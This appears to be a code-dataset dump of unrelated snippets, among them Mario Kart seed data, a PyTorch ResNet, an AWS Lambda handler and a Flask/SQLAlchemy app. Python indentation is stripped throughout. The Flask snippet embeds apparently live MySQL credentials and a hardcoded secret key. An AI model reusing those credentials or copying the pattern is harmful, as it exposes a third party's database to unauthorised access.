car_urls = [
'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926',
'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932',
'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956',
'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921',
'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132',
'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237',
'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217',
'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350',
'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333',
'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322',
'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656',
'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617',
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625',
'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637',
'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333',
'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',
'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',
'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059',
'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545',
'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836',
'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005',
'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107',
'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052',
'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849',
'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024',
'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857',
'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819',
'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942',
'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951',
'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925',
'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928',
'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256',
'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734',
'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936',
'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601',
'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111',
'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122',
'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120',
'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108',
'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814',
'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507',
]
tire_names = [
'Standard',
'Monster',
'Roller',
'Slim',
'Slick',
'Metal',
'Button',
'Off-Road',
'Sponge',
'Wood',
'Cushion',
'Blue Standard',
'Hot Monster',
'Azure Roller',
'Crimson Slim',
'Cyber Slick',
'Retro Off-Road',
'Gold Tires',
'GLA Tires',
'Triforce Tires',
'Ancient Tyres',
'Leaf Tires',
]
tire_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545',
'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541',
'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539',
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536',
'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542',
'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533',
'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541',
'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559',
'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549',
'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724',
'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817',
'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836',
'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834',
'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338',
'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627',
'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626',
'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629',
'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630',
'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539',
'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357',
'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442',
'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810',
]
glider_names = [
'Super Glider',
'Cloud Glider',
'Wario Wing',
'Waddle Wing',
'Peach Parasol',
'Parachute',
'Parafoil',
'Flower Glider',
'Bowser Kite',
'Plane Glider',
'MKTV Parafoil',
'Gold Glider',
'Hylian Kite',
'Paraglider',
'Paper Glider',
]
glider_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815',
'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838',
'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853',
'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901',
'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940',
'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823',
'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830',
'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846',
'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909',
'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930',
'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947',
'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956',
'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731',
'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246',
'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313',
]
x=0
y=0
for char in char_names:
index=x-y+1
name = char_names[x]
if "Yoshi (" in name or "Shyguy (" in name or "(G)" in name:
y+=1
index=None
new_char = Character(name=char_names[x],image_url=char_urls[x],index=index)
new_char.save()
x+=1
x=0
for tire in tire_names:
index=x+1
new_tire = Tire(name=tire_names[x],image_url=tire_urls[x],index=index)
new_tire.save()
x+=1
x=0
for car in car_names:
index=x+1
new_car = Vehicle(name=car_names[x],image_url=car_urls[x],index=index)
new_car.save()
x+=1
x=0
for glider in glider_names:
index=x+1
new_glider = Glider(name=glider_names[x],image_url=glider_urls[x],index=index)
new_glider.save()
x+=1
|
7,109 | 22b697790516e1160ac501a58ad93ef5b579414a | from django.contrib.auth.decorators import permission_required
from django.db import models
from students.models import Student
# Create your models here.
class Fine(models.Model):
amount = models.DecimalField(max_digits=8, decimal_places=2, null=True, default=0)
student = models.OneToOneField(Student, on_delete=models.DO_NOTHING)
timestamp = models.DateField(auto_now_add=True)
updated_at = models.DateField(auto_now=True)
class Meta:
db_table = 'fines'
verbose_name_plural = 'Fines'
verbose_name = 'Fine'
def __str__(self):
return str(self.amount)
|
7,110 | 88e34ee5cd5af7d3b04321c4aa4fc815f926add1 | # A program to display and find the sum of a list of numbers using for loop
list=[10,20,30,40,50]
sum=0;
for i in list:
print(i)
sum=sum+i
print('sum =',sum) |
7,111 | 497203be99643e2bb0087977f292f4ed890f9ead | import requests
import sqlite3
url = 'http://dummy.restapiexample.com/api/v1/employees'
r = requests.get(url)
packages_json = r.json()
# Create the employee database if it does not exist
db = sqlite3.connect('employee.sqlite')
#create the table
db.execute("CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)")
#db.execute("INSERT INTO employee(id, employee_name, employee_salary, employee_age, profile_image) VALUES(1, 'Levi', 50000, 24, '')")
# Loop through each employee information and insert into database
for employee in packages_json['data']:
db.execute("INSERT INTO employee VALUES (?, ?, ?, ?, ?)", [employee["id"], employee["employee_name"], employee["employee_salary"], employee["employee_age"],employee["profile_image"]])
db.commit()
db.close()
|
7,112 | 31996699bec6507d941eb8a7aaacffbd6248d79c | # coding: utf-8
import re
import numpy as np
from sklearn.manifold import TSNE
import word2vec
from matplotlib import pyplot as plt
from adjustText import adjust_text
import nltk
'''
word2vec.word2phrase('all.txt', 'phrases.txt', verbose=True)
word2vec.word2vec('phrases.txt', 'text.bin', size=100, verbose=True)
word2vec.word2clusters('all.txt', 'clusters.txt', 100, verbose=True)
'''
model = word2vec.load('text.bin')
words = [word for word in model.vocab[:500]]
X = [ model[word] for word in words]
X = np.array(X)
tsne = TSNE(n_components=2)
X_tsne = tsne.fit_transform(X)
def plot_scatter(x,y,texts,adjust=False):
fig, ax = plt.subplots()
ax.plot(x, y, 'bo')
texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]
if adjust:
plt.title(str( adjust_text(texts, x, y, arrowprops=dict(arrowstyle='->', color='red')))+' iterations')
plt.savefig("500")
pattern = re.compile(r"[,.:;!?โโโ]")
X, Y, texts = [], [], []
for i,word in enumerate(words):
if not pattern.findall(word):
tag = nltk.pos_tag([word])
if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1] != 'NN' and tag[0][1] != 'NNS':
continue
X.append(X_tsne[i][0])
Y.append(X_tsne[i][1])
texts.append(word)
print(len(X))
plot_scatter(X, Y, texts, True)
|
7,113 | 7801676df91a7ded6f123113acc62f3955dfe6cb | providers = {
'provider-1': {
'name': 'provider-1',
'roles': ['licensor', 'producer'],
'description': 'This is a full description of the provider',
'url': 'https://www.provider.com'
},
'provider-2': {
'name': 'provider-2',
'roles': ['licensor'],
'description': 'This is a full description of a second provider',
'url': 'https://www.provider.com/provider-2'
},
'provider-3': {
'name': 'provider-3',
}
}
providers_invalid = {
'provider-invalid': {
'name': 'provider invalid ', 'roles': ['Test'], 'url': 'This is not an url'
},
}
links = {
'link-1': {
'rel': 'describedBy',
'href': 'https://www.example.com/described-by',
'title': 'This is an extra link',
'link_type': 'description'
}
}
links_invalid = {
'link-invalid': {
'rel': 'invalid relation',
'href': 'not a url',
}
}
collections = {
'collection-1': {
'name': 'collection-1',
'description': 'This a collection description',
'title': 'My collection 1',
'license': 'proprietary',
'providers': providers.values(),
'links': links.values()
},
'collection-2': {
'name': 'collection-2',
'description': 'This a second open source collection description',
'title': 'My collection 2',
'license': 'MIT',
'providers': [providers['provider-2']]
},
'collection-3': {
'name': 'collection-3',
'description': 'This a third open source collection description',
'title': 'My collection 3',
'license': 'MIT',
'links': [links['link-1']]
},
'collection-4': {
'name': 'collection-3',
'description': 'This a fourth open source collection description',
'title': 'My collection 4',
'license': 'MIT'
},
'collection-invalid': {
'name': 'collection invalid name',
'description': 45,
'title': 34,
'license': ['proprietary'],
},
'collection-missing-mandatory-fields': {
'name': 'collection-missing-mandatory-fields'
},
'collection-invalid-links': {
'name': 'collection-invalid-link',
'description': 'This is a collection with invalid user link',
'license': 'proprietary',
'links': [links_invalid['link-invalid']]
},
'collection-invalid-providers': {
'name': 'collection-invalid-provider',
'description': 'This is a collection with invalid provider',
'license': 'proprietary',
'providers': providers_invalid.values()
},
}
|
7,114 | d3f42f329246164cdb6113df3da0eb2d3203b2a9 | import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes,
kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes,
kernel_size=3, stride=1,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion * planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion * planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion * planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
# print(out.shape)
out = self.bn2(self.conv2(out))
# print(out.shape)
out += self.shortcut(x)
# print(out.shape)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion * planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion * planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion * planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion * planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion * planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
# print(out.shape)
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, in_plane, block, num_blocks, hidden_dim=512, out_dim=1):
super(ResNet, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(in_plane, 64, kernel_size=3,
stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.fc1 = nn.Sequential(
nn.Linear(512 * block.expansion, hidden_dim),
nn.BatchNorm1d(hidden_dim),
nn.ReLU(inplace=True)
)
self.fc2 = nn.Linear(hidden_dim, out_dim)
self.img_output_dim = None
self.drop_path_prob = 0.0
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
# print(strides)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
# print(nn.Sequential(*layers))
return nn.Sequential(*layers)
def extract_feature(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
# print(out.shape)
return out
def sub_forward(self, x):
x = self.extract_feature(x)
# print(x.shape)
x = self.fc1(x)
# print(x.shape)
x = torch.sigmoid(x)
# print(x.shape)
return x
def forward(self, x0, x1):
x0 = self.sub_forward(x0)
if self.img_output_dim is None:
self.img_output_dim = x0.shape[1]
x1 = self.sub_forward(x1)
diff = torch.abs(x0 - x1)
scores = self.fc2(diff)
scores = torch.reshape(scores, (-1,))
# print(scores.shape)
return scores
class MLP_classifier(nn.Module):
def __init__(self, in_dim, hidden_dim=512, out_dim=10):
super(MLP_classifier, self).__init__()
self.fc1 = nn.Sequential(
nn.Linear(in_dim, hidden_dim),
nn.BatchNorm1d(hidden_dim),
nn.ReLU(inplace=True)
)
self.fc2 = nn.Sequential(
nn.Linear(hidden_dim, hidden_dim),
nn.BatchNorm1d(hidden_dim),
nn.ReLU(inplace=True)
)
self.fc3 = nn.Linear(hidden_dim, out_dim)
def forward(self, x):
x = x.detach()
out = self.fc1(x)
out = self.fc2(out)
out = self.fc3(out)
return out
def ResNet18():
return ResNet(BasicBlock, [2, 2, 2, 2])
def ResNet34(in_plane):
return ResNet(in_plane, BasicBlock, [3, 4, 6, 3])
def ResNet50(in_plane):
return ResNet(in_plane, Bottleneck, [3, 4, 6, 3])
def ResNet101(in_plane):
return ResNet(in_plane, Bottleneck, [3, 4, 23, 3])
def ResNet152(in_plane):
return ResNet(in_plane, Bottleneck, [3, 8, 36, 3])
if __name__ == '__main__':
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
device = torch.device(device)
x0 = torch.rand(128, 1, 64, 64).to(device)
net = ResNet34(1).to(device)
out = net(x0, x0)
print(out) |
7,115 | 7bac3b224586f8c42a104123432a7321a1251369 | function handler(event, context, callback){
var
AWS = require("aws-sdk"),
DDB = new AWS.DynamoDB({
apiVersion: "2012-08-10",
region: "us-east-1"
}),
city_str = event.city_str.toUpperCase(),
data = {
city_str: city_str,
temp_int_str: 72
},
response = {},
params = {
TableName: "weather",
KeyConditionExpression: "sc = :v1",
ExpressionAttributeValues: {
":v1":{
S: city_str
}
}
};
DDB.query(params, function(err, data){
var
item = {},
response = {
statusCode: 200,
headers: {},
body: null
};
if(err){
response.statusCode = 500;
console.log(err);
response.body = err;
}else{
// console.log(data.Items[0]);
var data = data.Items[0];
if(data && data.t){
console.log(data.sc.S + " and " + data.t.N);
item = {
temp_int:Number(data.t.N),
city_str: data.sc.S
};
}else{
item = {
city_str: event.city_str
//when we don't return a temp, the client can say city not found
};
}
}
response = item;
// console.log(response);
callback(null, response);
});
}
exports.handler = handler; |
7,116 | d7240703bc4cf9b566e7b50a536c83497cd8c6d7 | from flask import Flask, render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqldb://sql3354595:7Haz6Ng1fm@sql3.freemysqlhosting.net/sql3354595'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'mysecret'
db = SQLAlchemy(app)
class TipoUsuarios(db.Model):
id = db.Column(db.Integer, primary_key=True, nullable=False)
texto = db.Column(db.String(50))
usuarios = db.relationship('Usuarios', backref='tipo', lazy='dynamic')
def __init__(self, texto):
self.texto = texto
class Usuarios(db.Model):
id = db.Column(db.Integer, primary_key=True, nullable=False)
usuario = db.Column(db.String(50))
externa = db.Column(db.Integer, db.ForeignKey('tipo_usuarios.id'))
def __init__(self, usuario):
self.usuario = usuario
@app.route('/')
def index():
return 'Hola'
@app.route('/prueba')
def prueba():
us = Usuarios.query.all()
return render_template('db.html', us=us)
if __name__ == "__main__":
app.run(debug=True)
|
7,117 | 3b29912788fa4cc76f34f52da7728e934ee96637 | include('f469-disco/manifest_f469.py')
freeze('src') |
7,118 | f2292d1816699392663bdbf7a06c334de3b2022c | # ------------------------------------#
# Title: Mailroom Part 1
# Dev: SChang
# Date: Feb 2nd, 2019
# ChangeLog: (Who, When, What)
# SChang,02/02/2019, Created Script
# ------------------------------------#
import os
import sys
import math
donor_list = {"William Gates": [1010, 2020, 3030],
"Mark Zuckerberg": [5500, 4400],
"Jeff Bezos": [6745, 2345, 3845],
"Paul Allen": [9999, 8888, 7777]
}
# function for sending either adding new donor or checking against donor list
def send_ty():
DonorName = "list"
while DonorName == "list":
DonorName = input(""""Provide Donor Full Name, or type: "List" to display a list of all donors => """)
if DonorName.lower().strip() == "list":
view_donors()
continue
if DonorName[:1].lower() == "e":
return None
DonorName = DonorName.strip()
donor_amount = ask_donation_amount(DonorName)
if donor_amount is None:
return None
append_donation(DonorName, donor_amount)
print(ty_letter(DonorName, donor_amount), end='\n\n')
# function that recognizes name and donation amount which is passed through the send_ty function for print
def ty_letter(name,amount):
return f"""
Thank you, {name} for donating ${amount:.2f}"""
# function that is passed through send_ty function defined by donor_amount
def ask_donation_amount(name):
response = input(f"How much did {name} donate? ")
if response [:1].lower() == 'e':
return None
return float(response)
# function appending name/amount to the donor list if new
def append_donation(name, amount):
donor_list.setdefault(name, []).append(amount)
# viewing list of donors if "List" is entered from menu
def view_donors():
for donor in donor_list:
print(f"{donor}")
def report_sort(item):
return item[1]
# function for report that is formatted with donor information
def create_report():
print()
print("{:<20}| Total Given | Num Gifts | Average Gift".format("Donor Name"))
print("-" * 60)
for d, v in sorted(donor_list.items(), key=report_sort, reverse=True):
print("{:<21}${:>11.2f}{:>12} ${:>12.2f}".format(d, sum(v), len(v),
sum(v) / len(v)))
# function for exit option off menu
def exit_program ():
print("Program Exited!")
sys.exit()
def main():
menu_dict = {
"1": send_ty,
"2": create_report,
"3": exit_program
}
prompt_menu = "\n".join(("",
"Charity Management Application",
"Please choose from below options:",
"",
"1 - Send a Thank You",
"2 - Create a Report",
"3 - Exit",
">>> "))
while True:
response = input(prompt_menu)
menu_dict[response]()
if __name__ == "__main__":
# Guards against code running automatically if module is imported
main()
|
7,119 | 2e5dbd84eb1f9cc09602df8ef8d7bdd30e1b2f26 | #encoding=utf-8
import json
import os
def get_Userid(path):
path_Divided = path.split('\\')
#print(path_Divided)
get_id= path_Divided[6].split('.')
get_id = get_id[0]
#print(get_id)
return get_id
def compose_Json_Path_ToRead(path_json_source,get_id):
json_path_to_read = path_json_source+"\\"+str(get_id)+".json"
return json_path_to_read
def get_province_city_path_ToRead(province,city,input_year,input_month):
path_json_source = "F:\\Fast_Prepared_Json\\"+str(province)+"\\"+str(city)+"\\"+input_year+"\\"+input_month
return path_json_source
def read_Json_Source(json_path_to_read,pic_num_least,province,city,get_id):
f1 = open(json_path_to_read,encoding='utf-8')
pic_num = len(f1.readlines())
return pic_num
def gothrough_Source(path_json_source, province, city, pic_num_least):
total = 0
"""
ไธบไบ่ฝๅค็ๅฐไธ่ฝฝ่ฟๅบฆ๏ผๅจๆญคๅ
่ฎก็ฎ่ดฆๆทๆปๆฐ
"""
for dirpath, dirnames, filenames in os.walk(path_json_source):
for filepath in filenames:
path = os.path.join(dirpath, filepath)
# ็ฐๅจๅผๅงๅพๅฐๆไปถๅไธ็userid
get_id = get_Userid(path)
# ็ฐๅจๅผๅง่ฏปๅjsonๆฐๆฎๆบ
json_path_to_read = compose_Json_Path_ToRead(path_json_source, get_id)
pic_num = read_Json_Source(json_path_to_read, pic_num_least, province, city, get_id)
print(pic_num)
total = total+pic_num
print("TOTAL:",total)
"""
print("่ฏท่พๅ
ฅๆณ่ฆไธ่ฝฝ็็ไปฝๆ็ด่พๅธ๏ผ")
input_province = input()
print("่ฏท่พๅ
ฅๆณ่ฆไธ่ฝฝ็ๅๅธ๏ผ")
input_city = input()
print("่ฏท่พๅ
ฅๆณ่ฆไธ่ฝฝ็ๅนดไปฝ๏ผ๏ผ2014๏ผ")
input_year = input()
print("่ฏท่พๅ
ฅๆณ่ฆไธ่ฝฝ็ๆไปฝ๏ผ๏ผ07๏ผ")
input_month = input()
print("่ฏท่พๅ
ฅๆณ่ฆ่ฟๆปค็ๅพ็ๆฐ็ฎไธ้๏ผ")
pic_num_least = input()
"""
input_province = "ๅนฟไธ็"
input_city = "ๅนฟๅทๅธ"
input_year = "2014"
input_month = "08"
pic_num_least = 1
path_json_source = get_province_city_path_ToRead(input_province,input_city,input_year,input_month)
gothrough_Source(path_json_source,input_province,input_city,pic_num_least)
print("Ok!")
mark = input() |
7,120 | 45856b4c5cbf1d3b414ad769135b2d974bc0a22b | # -*- coding: utf-8 -*-
"""
Copyright (C) 2015, MuChu Hsu
Contributed by Muchu Hsu (muchu1983@gmail.com)
This file is part of BSD license
<https://opensource.org/licenses/BSD-3-Clause>
"""
import unittest
import logging
from cameo.spiderForCROWDCUBE import SpiderForCROWDCUBE
"""
ๆธฌ่ฉฆ ๆๅ CROWDCUBE
"""
class SpiderForCROWDCUBETest(unittest.TestCase):
#ๆบๅ
def setUp(self):
logging.basicConfig(level=logging.INFO)
self.spider = SpiderForCROWDCUBE()
self.spider.initDriver()
#ๆถๅฐพ
def tearDown(self):
self.spider.quitDriver()
"""
#ๆธฌ่ฉฆ่จปๅๅธณ่
def test_registerAccount(self):
logging.info("SpiderForCROWDCUBETest.test_registerAccount")
self.spider.registerAccount()
#ๆธฌ่ฉฆ็ปๅ
ฅๅธณ่
def test_loginAccount(self):
logging.info("SpiderForCROWDCUBETest.test_loginAccount")
self.spider.loginAccount()
#ๆธฌ่ฉฆๆๅ companies page
def test_downloadCompaniesPage(self):
logging.info("SpiderForCROWDCUBETest.test_downloadCompaniesPage")
self.spider.downloadCompaniesPage()
"""
#ๆธฌ่ฉฆๆๅ company page
def test_downloadCompanyPage(self):
logging.info("SpiderForCROWDCUBETest.test_downloadCompanyPage")
